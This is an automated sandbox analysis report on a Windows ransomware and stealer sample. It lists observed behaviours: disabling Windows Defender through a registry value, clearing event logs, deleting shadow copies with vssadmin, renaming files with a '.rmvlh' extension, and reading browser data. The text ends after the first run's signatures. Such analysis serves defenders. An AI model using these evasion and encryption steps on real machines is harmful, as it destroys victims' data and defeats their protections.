Malware Analysis Report

2024-10-16 03:13

Sample ID 220113-m9h3pahfhp
Target cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
SHA256 cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52
Tags
evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52

Threat Level: Known bad

The file cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52 was found to be: Known bad.

Malicious Activity Summary

evasion ransomware spyware stealer trojan

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Modifies security service

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Modifies registry class

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 11:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 11:09

Reported

2022-01-13 11:15

Platform

win7-en-20211208

Max time kernel

76s

Max time network

11s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\OpenAssert.tiff => C:\Users\Admin\Pictures\OpenAssert.tiff.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9KebEnw4gEI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Users\Admin\Pictures\OpenAssert.tiff.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9KebEnw4gEI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\cpu.html C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_9NAdTrUJeC40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_Qrd4IvnJzPc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_m.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\RSSFeeds.js C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_ADiRQllairk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosecolor.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_MXZJJ4WUxnQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu.xml C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_rq7e2_KsCQs0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALSO11.POC.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_f8M-jawD-IY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\cpu.js C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_wWZPaLIDDeU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_RJf62V18BVc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_8dkGt0xinNI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Services\verisign.bmp C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\THMBNAIL.PNG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_ljF4K7p5GvM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\IPSEventLogMsg.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\DVD Maker\es-ES\DVDMaker.exe.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\calendar.html C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\1033\OFFICE10.MML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r__MGKcq8DDRA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_h7T4MxsDRmc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FORM.JS.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_WprltnpjyXY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_3qDjTSVtFDo0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_juk-N-WIYMw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_TK3AtYmSjO80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00042_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_K5gdYiYM_fY0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00192_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_BR_ZN6vFapI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01747_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_esaxQFczKTQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_KYzaN8XbyRw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_r2SdrmcUdkE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_h_9LQox2V3o0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_rFB-NOHF3hA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN109.XML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_g14wyIsXjQ40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_iYtaBE56RB00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0282126.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_MNBjHMEZzQQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_UGPjbt12ic80.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MAIN.XML.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_DEUeS8swjTI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\OrielFax.Dotx.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_sa1y37L73aE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_zvTl_2HK4Zo0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_3H_x3N34MjM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_335IA03UFWw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00256_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_C7HNnOm9oms0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00330_.WMF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_PM1W1QnOLZU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14790_.GIF.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_TC6ECwCeRb40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_GGmywEV8mYk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r__ygF8GhN0Nw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_zQuZxzJAfA40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_viXym954DZc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\picturePuzzle.css C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBOB6.CHM.f1XMYGeC4eMcOzLcWV8pAG3iyokDxl99g1M7TdVbf0r_uVD9FKTWw9k0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

